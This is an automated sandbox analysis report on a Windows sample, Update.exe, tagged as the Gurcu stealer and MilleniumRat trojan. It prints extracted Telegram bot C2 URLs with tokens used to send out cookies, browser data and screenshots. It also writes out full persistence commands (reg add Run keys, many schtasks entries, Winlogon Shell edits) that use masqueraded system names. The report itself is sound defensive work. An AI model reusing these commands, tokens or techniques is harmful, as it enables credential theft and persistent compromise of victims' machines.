Analysis
-
max time kernel
149s -
max time network
150s -
platform
windows10-2004_x64 -
resource
win10v2004-20241007-en -
resource tags
arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system -
submitted
10-11-2024 11:30
Static task
static1
Behavioral task
behavioral1
Sample
Update.exe
Resource
win7-20240903-en
Behavioral task
behavioral2
Sample
Update.exe
Resource
win10v2004-20241007-en
Behavioral task
behavioral3
Sample
Update.exe
Resource
win11-20241007-en
General
-
Target
Update.exe
-
Size
5.6MB
-
MD5
3d3c49dd5d13a242b436e0a065cd6837
-
SHA1
e38a773ffa08452c449ca5a880d89cfad24b6f1b
-
SHA256
e0338c845a876d585eceb084311e84f3becd6fa6f0851567ba2c5f00eeaf4ecf
-
SHA512
dd0e590310392b0543d47a2d24d55f6f091ba59acc0d7ea533039ffb48f1b8938587889bcfa19b0538a62ba26fcde2172253860ceab34af40fd7bf65b6587b00
-
SSDEEP
98304:nsl27OuKr+gvhf2U9Nzm31PMoslkqXf0FvUcwti78OqJ7TPBvc8X6UcR6s:nPOuK6mn9NzgMoYkSIvUcwti7TQlvciY
Malware Config
Extracted
gurcu
https://api.telegram.org/bot7258239318:AAE_J6DhWLSRk9YOV8l1ienRdy5HsJZuR6I/sendDocument?chat_id=-1002245526003&caption=%F0%9F%93%82%20-%20Browser%20data%0A%E2%94%9C%E2%94%80%E2%94%80%20%F0%9F%93%82%20-%20cookies(0.25%20kb
https://api.telegram.org/bot7258239318:AAE_J6DhWLSRk9YOV8l1ienRdy5HsJZuR6I/sendMessage?chat_id=-1002245526003
https://api.telegram.org/bot7258239318:AAE_J6DhWLSRk9YOV8l1ienRdy5HsJZuR6I/getUpdates?offset=-
https://api.telegram.org/bot7258239318:AAE_J6DhWLSRk9YOV8l1ienRdy5HsJZuR6I/getFile?file_id=BQACAgEAAyEFAASF2AHzAALo32cwmclUhPuWXfdYQBV-4RCiQcQ6AAJuBAAC1teJRe0sQvfq9qudNg
https://api.telegram.org/bot7457548429:AAGMvKYWjBbGXayEC5uoksRl1i2BIy7ylDg/sendMessage?chat_id=6024388590
https://api.telegram.org/bot7457548429:AAGMvKYWjBbGXayEC5uoksRl1i2BIy7ylDg/getUpdates?offset=-
https://api.telegram.org/bot7258239318:AAE_J6DhWLSRk9YOV8l1ienRdy5HsJZuR6I/sendDocument?chat_id=-1002245526003&caption=%F0%9F%93%B8Screenshot%20take
Signatures
-
Gurcu family
-
MilleniumRat
MilleniumRat is a remote access trojan written in C#.
-
Milleniumrat family
-
Modifies WinLogon for persistence 2 TTPs 5 IoCs
Processes:
ChainComServermonitor.exedescription ioc process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\Users\\Default User\\csrss.exe\", \"C:\\Windows\\Containers\\serviced\\RuntimeBroker.exe\", \"C:\\Recovery\\WindowsRE\\SppExtComObj.exe\", \"C:\\Program Files (x86)\\Windows Portable Devices\\lsass.exe\", \"C:\\Program Files (x86)\\WindowsPowerShell\\Configuration\\Registry.exe\"" ChainComServermonitor.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\Users\\Default User\\csrss.exe\"" ChainComServermonitor.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\Users\\Default User\\csrss.exe\", \"C:\\Windows\\Containers\\serviced\\RuntimeBroker.exe\"" ChainComServermonitor.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\Users\\Default User\\csrss.exe\", \"C:\\Windows\\Containers\\serviced\\RuntimeBroker.exe\", \"C:\\Recovery\\WindowsRE\\SppExtComObj.exe\"" ChainComServermonitor.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\Users\\Default User\\csrss.exe\", \"C:\\Windows\\Containers\\serviced\\RuntimeBroker.exe\", \"C:\\Recovery\\WindowsRE\\SppExtComObj.exe\", \"C:\\Program Files (x86)\\Windows Portable Devices\\lsass.exe\"" ChainComServermonitor.exe -
Process spawned unexpected child process 15 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
Processes:
schtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exedescription pid pid_target process target process Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2160 4948 schtasks.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 736 4948 schtasks.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2976 4948 schtasks.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 3948 4948 schtasks.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 4676 4948 schtasks.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 1956 4948 schtasks.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 4044 4948 schtasks.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 3232 4948 schtasks.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 1924 4948 schtasks.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2604 4948 schtasks.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 1112 4948 schtasks.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 1116 4948 schtasks.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 1696 4948 schtasks.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 4896 4948 schtasks.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 4040 4948 schtasks.exe -
Downloads MZ/PE file
-
Checks computer location settings 2 TTPs 5 IoCs
Looks up country code configured in the registry, likely geofence.
Processes:
Update.exesvchost64.exeWScript.exeChainComServermonitor.exeUpdate.exedescription ioc process Key value queried \REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000\Control Panel\International\Geo\Nation Update.exe Key value queried \REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000\Control Panel\International\Geo\Nation svchost64.exe Key value queried \REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000\Control Panel\International\Geo\Nation WScript.exe Key value queried \REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000\Control Panel\International\Geo\Nation ChainComServermonitor.exe Key value queried \REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000\Control Panel\International\Geo\Nation Update.exe -
Executes dropped EXE 4 IoCs
Processes:
Update.exesvchost64.exeChainComServermonitor.execsrss.exepid process 1832 Update.exe 3404 svchost64.exe 1368 ChainComServermonitor.exe 3984 csrss.exe -
Loads dropped DLL 2 IoCs
Processes:
Update.exeUpdate.exepid process 3992 Update.exe 1832 Update.exe -
Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Adds Run key to start application 2 TTPs 11 IoCs
Processes:
ChainComServermonitor.exereg.exedescription ioc process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\csrss = "\"C:\\Users\\Default User\\csrss.exe\"" ChainComServermonitor.exe Set value (str) \REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\SppExtComObj = "\"C:\\Recovery\\WindowsRE\\SppExtComObj.exe\"" ChainComServermonitor.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\lsass = "\"C:\\Program Files (x86)\\Windows Portable Devices\\lsass.exe\"" ChainComServermonitor.exe Set value (str) \REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Registry = "\"C:\\Program Files (x86)\\WindowsPowerShell\\Configuration\\Registry.exe\"" ChainComServermonitor.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Registry = "\"C:\\Program Files (x86)\\WindowsPowerShell\\Configuration\\Registry.exe\"" ChainComServermonitor.exe Set value (str) \REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\ChromeUpdate = "C:\\Users\\Admin\\AppData\\Roaming\\GoogleChromeUpdateLog\\Update.exe" reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\csrss = "\"C:\\Users\\Default User\\csrss.exe\"" ChainComServermonitor.exe Set value (str) \REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\RuntimeBroker = "\"C:\\Windows\\Containers\\serviced\\RuntimeBroker.exe\"" ChainComServermonitor.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\RuntimeBroker = "\"C:\\Windows\\Containers\\serviced\\RuntimeBroker.exe\"" ChainComServermonitor.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\SppExtComObj = "\"C:\\Recovery\\WindowsRE\\SppExtComObj.exe\"" ChainComServermonitor.exe Set value (str) \REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\lsass = "\"C:\\Program Files (x86)\\Windows Portable Devices\\lsass.exe\"" ChainComServermonitor.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs 3 IoCs
Processes:
flow ioc 22 raw.githubusercontent.com 9 raw.githubusercontent.com 10 raw.githubusercontent.com -
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
Processes:
flow ioc 3 ip-api.com -
Drops file in System32 directory 2 IoCs
Processes:
csc.exedescription ioc process File created \??\c:\Windows\System32\CSC837090D1F06942E98FC474914FA42D58.TMP csc.exe File created \??\c:\Windows\System32\-63gkj.exe csc.exe -
Enumerates processes with tasklist 1 TTPs 1 IoCs
-
Drops file in Program Files directory 4 IoCs
Processes:
ChainComServermonitor.exedescription ioc process File created C:\Program Files (x86)\Windows Portable Devices\lsass.exe ChainComServermonitor.exe File created C:\Program Files (x86)\Windows Portable Devices\6203df4a6bafc7 ChainComServermonitor.exe File created C:\Program Files (x86)\WindowsPowerShell\Configuration\Registry.exe ChainComServermonitor.exe File created C:\Program Files (x86)\WindowsPowerShell\Configuration\ee2ad38f3d4382 ChainComServermonitor.exe -
Drops file in Windows directory 2 IoCs
Processes:
ChainComServermonitor.exedescription ioc process File created C:\Windows\Containers\serviced\RuntimeBroker.exe ChainComServermonitor.exe File created C:\Windows\Containers\serviced\9e8d7a4ca61bd9 ChainComServermonitor.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 3 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
Processes:
svchost64.exeWScript.execmd.exedescription ioc process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language svchost64.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language WScript.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe -
System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 1 IoCs
Adversaries may check for Internet connectivity on compromised systems.
-
Checks processor information in registry 2 TTPs 2 IoCs
Processor information is often read in order to detect sandboxing environments.
Processes:
Update.exedescription ioc process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier Update.exe Key opened \REGISTRY\MACHINE\HARDWARE\Description\System\CentralProcessor\0 Update.exe -
Delays execution with timeout.exe 1 IoCs
Processes:
timeout.exepid process 5016 timeout.exe -
Modifies registry class 2 IoCs
Processes:
svchost64.exeChainComServermonitor.exedescription ioc process Key created \REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000_Classes\Local Settings svchost64.exe Key created \REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000_Classes\Local Settings ChainComServermonitor.exe -
Modifies registry key 1 TTPs 1 IoCs
-
Runs ping.exe 1 TTPs 1 IoCs
-
Scheduled Task/Job: Scheduled Task 1 TTPs 15 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
Processes:
schtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exepid process 2160 schtasks.exe 2976 schtasks.exe 1956 schtasks.exe 3232 schtasks.exe 1924 schtasks.exe 2604 schtasks.exe 1116 schtasks.exe 1696 schtasks.exe 4896 schtasks.exe 736 schtasks.exe 3948 schtasks.exe 4676 schtasks.exe 4044 schtasks.exe 1112 schtasks.exe 4040 schtasks.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
Processes:
Update.exeUpdate.exepid process 3992 Update.exe 3992 Update.exe 3992 Update.exe 3992 Update.exe 3992 Update.exe 3992 Update.exe 3992 Update.exe 3992 Update.exe 3992 Update.exe 3992 Update.exe 3992 Update.exe 3992 Update.exe 3992 Update.exe 3992 Update.exe 3992 Update.exe 3992 Update.exe 3992 Update.exe 3992 Update.exe 3992 Update.exe 3992 Update.exe 3992 Update.exe 3992 Update.exe 3992 Update.exe 1832 Update.exe 1832 Update.exe 1832 Update.exe 1832 Update.exe 1832 Update.exe 1832 Update.exe 1832 Update.exe 1832 Update.exe 1832 Update.exe 1832 Update.exe 1832 Update.exe 1832 Update.exe 1832 Update.exe 1832 Update.exe 1832 Update.exe 1832 Update.exe 1832 Update.exe 1832 Update.exe 1832 Update.exe 1832 Update.exe 1832 Update.exe 1832 Update.exe 1832 Update.exe 1832 Update.exe 1832 Update.exe 1832 Update.exe 1832 Update.exe 1832 Update.exe 1832 Update.exe 1832 Update.exe 1832 Update.exe 1832 Update.exe 1832 Update.exe 1832 Update.exe 1832 Update.exe 1832 Update.exe 1832 Update.exe 1832 Update.exe 1832 Update.exe 1832 Update.exe 1832 Update.exe -
Suspicious use of AdjustPrivilegeToken 5 IoCs
Processes:
Update.exetasklist.exeUpdate.exeChainComServermonitor.execsrss.exedescription pid process Token: SeDebugPrivilege 3992 Update.exe Token: SeDebugPrivilege 4148 tasklist.exe Token: SeDebugPrivilege 1832 Update.exe Token: SeDebugPrivilege 1368 ChainComServermonitor.exe Token: SeDebugPrivilege 3984 csrss.exe -
Suspicious use of SetWindowsHookEx 1 IoCs
Processes:
Update.exepid process 1832 Update.exe -
Suspicious use of WriteProcessMemory 41 IoCs
Processes:
Update.execmd.exeUpdate.execmd.exesvchost64.exeWScript.execmd.exeChainComServermonitor.execsc.execsc.execmd.exedescription pid process target process PID 3992 wrote to memory of 3620 3992 Update.exe cmd.exe PID 3992 wrote to memory of 3620 3992 Update.exe cmd.exe PID 3620 wrote to memory of 4148 3620 cmd.exe tasklist.exe PID 3620 wrote to memory of 4148 3620 cmd.exe tasklist.exe PID 3620 wrote to memory of 3588 3620 cmd.exe find.exe PID 3620 wrote to memory of 3588 3620 cmd.exe find.exe PID 3620 wrote to memory of 5016 3620 cmd.exe timeout.exe PID 3620 wrote to memory of 5016 3620 cmd.exe timeout.exe PID 3620 wrote to memory of 1832 3620 cmd.exe Update.exe PID 3620 wrote to memory of 1832 3620 cmd.exe Update.exe PID 1832 wrote to memory of 1496 1832 Update.exe cmd.exe PID 1832 wrote to memory of 1496 1832 Update.exe cmd.exe PID 1496 wrote to memory of 2944 1496 cmd.exe reg.exe PID 1496 wrote to memory of 2944 1496 cmd.exe reg.exe PID 1832 wrote to memory of 3404 1832 Update.exe svchost64.exe PID 1832 wrote to memory of 3404 1832 Update.exe svchost64.exe PID 1832 wrote to memory of 3404 1832 Update.exe svchost64.exe PID 3404 wrote to memory of 4284 3404 svchost64.exe WScript.exe PID 3404 wrote to memory of 4284 3404 svchost64.exe WScript.exe PID 3404 wrote to memory of 4284 3404 svchost64.exe WScript.exe PID 4284 wrote to memory of 3848 4284 WScript.exe cmd.exe PID 4284 wrote to memory of 3848 4284 WScript.exe cmd.exe PID 4284 wrote to memory of 3848 4284 WScript.exe cmd.exe PID 3848 wrote to memory of 1368 3848 cmd.exe ChainComServermonitor.exe PID 3848 wrote to memory of 1368 3848 cmd.exe ChainComServermonitor.exe PID 1368 wrote to memory of 1164 1368 ChainComServermonitor.exe csc.exe PID 1368 wrote to memory of 1164 1368 ChainComServermonitor.exe csc.exe PID 1164 wrote to memory of 4408 1164 csc.exe cvtres.exe PID 1164 wrote to memory of 4408 1164 csc.exe cvtres.exe PID 1368 wrote to memory of 3572 1368 ChainComServermonitor.exe csc.exe PID 1368 wrote to memory of 3572 1368 ChainComServermonitor.exe csc.exe PID 3572 wrote to memory of 2124 3572 csc.exe cvtres.exe PID 3572 wrote to memory of 2124 3572 csc.exe cvtres.exe PID 1368 wrote to memory of 3488 1368 ChainComServermonitor.exe cmd.exe PID 1368 wrote to memory of 3488 1368 ChainComServermonitor.exe cmd.exe PID 3488 wrote to memory of 1988 3488 cmd.exe chcp.com PID 3488 wrote to memory of 1988 3488 cmd.exe chcp.com PID 3488 wrote to memory of 1348 3488 cmd.exe PING.EXE PID 3488 wrote to memory of 1348 3488 cmd.exe PING.EXE PID 3488 wrote to memory of 3984 3488 cmd.exe csrss.exe PID 3488 wrote to memory of 3984 3488 cmd.exe csrss.exe -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Users\Admin\AppData\Local\Temp\Update.exe"C:\Users\Admin\AppData\Local\Temp\Update.exe"1⤵
- Checks computer location settings
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3992 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C C:\Users\Admin\AppData\Local\Temp\tmp97DB.tmp.bat & Del C:\Users\Admin\AppData\Local\Temp\tmp97DB.tmp.bat2⤵
- Suspicious use of WriteProcessMemory
PID:3620 -
C:\Windows\system32\tasklist.exeTasklist /fi "PID eq 3992"3⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
PID:4148
-
-
C:\Windows\system32\find.exefind ":"3⤵PID:3588
-
-
C:\Windows\system32\timeout.exeTimeout /T 1 /Nobreak3⤵
- Delays execution with timeout.exe
PID:5016
-
-
C:\Users\Admin\AppData\Roaming\GoogleChromeUpdateLog\Update.exe"C:\Users\Admin\AppData\Roaming\GoogleChromeUpdateLog\Update.exe"3⤵
- Checks computer location settings
- Executes dropped EXE
- Loads dropped DLL
- Checks processor information in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:1832 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v ChromeUpdate /t REG_SZ /d C:\Users\Admin\AppData\Roaming\GoogleChromeUpdateLog\Update.exe /f4⤵
- Suspicious use of WriteProcessMemory
PID:1496 -
C:\Windows\system32\reg.exereg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v ChromeUpdate /t REG_SZ /d C:\Users\Admin\AppData\Roaming\GoogleChromeUpdateLog\Update.exe /f5⤵
- Adds Run key to start application
- Modifies registry key
PID:2944
-
-
-
C:\Users\Admin\AppData\Roaming\GoogleChromeUpdateLog\svchost64.exe"C:\Users\Admin\AppData\Roaming\GoogleChromeUpdateLog\svchost64.exe"4⤵
- Checks computer location settings
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Modifies registry class
- Suspicious use of WriteProcessMemory
PID:3404 -
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\msAgentSavesmonitor\pFG3Duil1NAbFHoInFFIi7JfPHXMZXRvb98S0ewJA0VkW.vbe"5⤵
- Checks computer location settings
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:4284 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\msAgentSavesmonitor\oGgyulsi03j6EO3sjCC.bat" "6⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:3848 -
C:\Users\Admin\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe"C:\Users\Admin\AppData\Local\Temp\msAgentSavesmonitor/ChainComServermonitor.exe"7⤵
- Modifies WinLogon for persistence
- Checks computer location settings
- Executes dropped EXE
- Adds Run key to start application
- Drops file in Program Files directory
- Drops file in Windows directory
- Modifies registry class
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1368 -
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\wkdqih2d\wkdqih2d.cmdline"8⤵
- Suspicious use of WriteProcessMemory
PID:1164 -
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESE0A7.tmp" "c:\Users\Admin\AppData\Roaming\GoogleChromeUpdateLog\CSCB560B0BD557F4785A9D9C25F3B5039FE.TMP"9⤵PID:4408
-
-
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\cbuvczlw\cbuvczlw.cmdline"8⤵
- Drops file in System32 directory
- Suspicious use of WriteProcessMemory
PID:3572 -
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESE104.tmp" "c:\Windows\System32\CSC837090D1F06942E98FC474914FA42D58.TMP"9⤵PID:2124
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\uQxzmm9Eja.bat"8⤵
- Suspicious use of WriteProcessMemory
PID:3488 -
C:\Windows\system32\chcp.comchcp 650019⤵PID:1988
-
-
C:\Windows\system32\PING.EXEping -n 10 localhost9⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:1348
-
-
C:\Users\Default User\csrss.exe"C:\Users\Default User\csrss.exe"9⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:3984
-
-
-
-
-
-
-
-
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "csrssc" /sc MINUTE /mo 6 /tr "'C:\Users\Default User\csrss.exe'" /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:2160
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "csrss" /sc ONLOGON /tr "'C:\Users\Default User\csrss.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:736
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "csrssc" /sc MINUTE /mo 13 /tr "'C:\Users\Default User\csrss.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:2976
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "RuntimeBrokerR" /sc MINUTE /mo 8 /tr "'C:\Windows\Containers\serviced\RuntimeBroker.exe'" /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:3948
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "RuntimeBroker" /sc ONLOGON /tr "'C:\Windows\Containers\serviced\RuntimeBroker.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:4676
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "RuntimeBrokerR" /sc MINUTE /mo 10 /tr "'C:\Windows\Containers\serviced\RuntimeBroker.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:1956
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "SppExtComObjS" /sc MINUTE /mo 14 /tr "'C:\Recovery\WindowsRE\SppExtComObj.exe'" /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:4044
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "SppExtComObj" /sc ONLOGON /tr "'C:\Recovery\WindowsRE\SppExtComObj.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:3232
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "SppExtComObjS" /sc MINUTE /mo 8 /tr "'C:\Recovery\WindowsRE\SppExtComObj.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:1924
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "lsassl" /sc MINUTE /mo 6 /tr "'C:\Program Files (x86)\Windows Portable Devices\lsass.exe'" /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:2604
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "lsass" /sc ONLOGON /tr "'C:\Program Files (x86)\Windows Portable Devices\lsass.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:1112
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "lsassl" /sc MINUTE /mo 9 /tr "'C:\Program Files (x86)\Windows Portable Devices\lsass.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:1116
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "RegistryR" /sc MINUTE /mo 11 /tr "'C:\Program Files (x86)\WindowsPowerShell\Configuration\Registry.exe'" /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:1696
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "Registry" /sc ONLOGON /tr "'C:\Program Files (x86)\WindowsPowerShell\Configuration\Registry.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:4896
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "RegistryR" /sc MINUTE /mo 6 /tr "'C:\Program Files (x86)\WindowsPowerShell\Configuration\Registry.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:4040
Network
MITRE ATT&CK Enterprise v15
Persistence
Boot or Logon Autostart Execution
2Registry Run Keys / Startup Folder
1Winlogon Helper DLL
1Scheduled Task/Job
1Scheduled Task
1Privilege Escalation
Boot or Logon Autostart Execution
2Registry Run Keys / Startup Folder
1Winlogon Helper DLL
1Scheduled Task/Job
1Scheduled Task
1Credential Access
Credentials from Password Stores
1Credentials from Web Browsers
1Unsecured Credentials
1Credentials In Files
1Discovery
Browser Information Discovery
1Process Discovery
1Query Registry
3Remote System Discovery
1System Information Discovery
3System Location Discovery
1System Language Discovery
1System Network Configuration Discovery
1Internet Connection Discovery
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
1KB
MD59e8cab527db784fa373e8b3ee2809029
SHA1b1fea2a154908c1a0bfc476f0279f44dbb89249c
SHA25684c010466cd6465eec0ac04f1aa37652cf4ed3532e7981ac0fb59df855d7cc4c
SHA512f238dd04fa22540bd10803fd59d49944511df1b340b4a68f0c096c45498e6c58218d07768ad0572ed8886bb5b20053e42adf235447065bbbfa0e6d9fd77e9cfc
-
Filesize
1.7MB
MD565ccd6ecb99899083d43f7c24eb8f869
SHA127037a9470cc5ed177c0b6688495f3a51996a023
SHA256aba67c7e6c01856838b8bc6b0ba95e864e1fdcb3750aa7cdc1bc73511cea6fe4
SHA512533900861fe36cf78b614d6a7ce741ff1172b41cbd5644b4a9542e6ca42702e6fbfb12f0fbaae8f5992320870a15e90b4f7bf180705fc9839db433413860be6d
-
Filesize
1KB
MD588765410e95a3260c9625c6fa63dc28f
SHA1766d197d1ab8c16b74ac363062754c7a41fd9ec2
SHA2569fadff944173b766923bd3912789d4fc9332c425ddc23a9a2623e4339cce2205
SHA512cc37dbb6a8e96e6a2e71a2d646123136bf2a329d240fffa4d552cebcc416401423fc122594781d100ed7f6e56297db1ebade870aedd758c6aafb9e5bb53cb460
-
Filesize
1KB
MD5a9dd46c3aa29f80a20ec96f56ecf1874
SHA11ef2d3e9478f099a8438807fac08d92f7c275947
SHA256f684dcf51eb362d49ad69ee2da0f7ff5fd872020850a2ca6e64b85028c7475ab
